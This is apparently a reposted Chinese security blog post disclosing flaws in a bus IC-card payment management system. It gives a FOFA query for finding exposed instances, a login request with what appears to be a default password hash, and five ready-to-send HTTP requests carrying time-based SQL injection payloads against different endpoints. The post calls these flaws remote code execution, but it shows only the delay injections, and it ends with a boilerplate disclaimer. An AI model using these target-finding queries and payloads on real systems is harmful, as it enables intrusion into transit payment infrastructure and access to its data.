![公交车系统多处RCE漏洞【我最近跟公交车杠上了】]( "公交车系统多处RCE漏洞【我最近跟公交车杠上了】")
产品简介
![公交车系统多处RCE漏洞【我最近跟公交车杠上了】]( "公交车系统多处RCE漏洞【我最近跟公交车杠上了】")
产品简介
公交IC卡系统是公交一卡通系统核心建设部分,是高时尚、高科技的管理系统,大大提升了公交行业的服务,能让公交企业信息化和电子化打下一个良好的硬件基础和软件基础。
![公交车系统多处RCE漏洞【我最近跟公交车杠上了】]( "公交车系统多处RCE漏洞【我最近跟公交车杠上了】")
FOFA
![公交车系统多处RCE漏洞【我最近跟公交车杠上了】]( "公交车系统多处RCE漏洞【我最近跟公交车杠上了】")
FOFA
FOFA:app="公交IC卡收单管理系统"
![公交车系统多处RCE漏洞【我最近跟公交车杠上了】]( "公交车系统多处RCE漏洞【我最近跟公交车杠上了】")
漏洞复现
![公交车系统多处RCE漏洞【我最近跟公交车杠上了】]( "公交车系统多处RCE漏洞【我最近跟公交车杠上了】")
漏洞复现
POST /login HTTP/1.1Host:Accept: */*Content-Type: application/x-www-form-urlencoded; charset=UTF-8Accept-Encoding: gzip, deflatePriority: u=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2X-Requested-With: XMLHttpRequestusername=admin&password=e10adc3949ba59abbe56e057f20f883e
获取cookie
POC-1
POST /role HTTP/1.1Host:Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0Accept-Encoding: gzip, deflateCookie: JSESSIONID=BE20D06711487C9D6D5325C1129F244CAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2X-Requested-With: XMLHttpRequest_search=false&nd=1727245571646&rowCountPerPage=10&pageNo=1&sidx=ROLE_NAME&sord=asc&method=select&ROLE_NAME=1');WAITFOR DELAY '0:0:5'--
延时5秒,执行两次
POC-2
POST /user HTTP/1.1Host:Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2X-Requested-With: XMLHttpRequestAccept-Encoding: gzip, deflateCookie: JSESSIONID=BE20D06711487C9D6D5325C1129F244CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0Content-Type: application/x-www-form-urlencoded; charset=UTF-8_search=false&nd=1727245865182&rowCountPerPage=10&pageNo=1&sidx=USER_NAME&sord=asc&method=select&USER_NAME=1');WAITFOR DELAY '0:0:5'--&REAL_NAME=1&ACCOUNT_EXPIRE_TIME=%E5%BF%BD%E7%95%A5&PASSWORD_EXPIRE_TIME=%E5%BF%BD%E7%95%A5
POC-3
POST /bus HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0Content-Type: application/x-www-form-urlencoded; charset=UTF-8Cookie: JSESSIONID=BE20D06711487C9D6D5325C1129F244CAccept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2_search=false&nd=1727248354972&rowCountPerPage=10&pageNo=1&sidx=BUS_CODE&sord=asc&method=select&BUS_CODE=1');WAITFOR DELAY '0:0:5'--
POC-4
POST /line HTTP/1.1Host:Cookie: JSESSIONID=BE20D06711487C9D6D5325C1129F244CX-Requested-With: XMLHttpRequestAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0Accept: application/json, text/javascript, */*; q=0.01Accept-Encoding: gzip, deflatePriority: u=0Content-Type: application/x-www-form-urlencoded; charset=UTF-8_search=false&nd=1727248712232&rowCountPerPage=10&pageNo=1&sidx=LINE_CODE&sord=asc&method=select&ORGANIZATION_CODE=&LINE_CODE=1');WAITFOR DELAY '0:0:5'--
POC-5
POST /parametercard HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0Priority: u=0Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2X-Requested-With: XMLHttpRequestContent-Type: application/x-www-form-urlencoded; charset=UTF-8Cookie: JSESSIONID=BE20D06711487C9D6D5325C1129F244CAccept: application/json, text/javascript, */*; q=0.01Accept-Encoding: gzip, deflatemethod=select&organization=&lineCode=&_search=false&nd=1727249021156&rowCountPerPage=10&pageNo=1&sidx=LINE_CODE&sord=asc&ORGANIZATION_CODE=&LINE_CODE=1');WAITFOR DELAY '0:0:5'--
直接RCE
原文始发于微信公众号(暗影网安实验室):公交车系统多处RCE漏洞【我最近跟公交车杠上了】
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论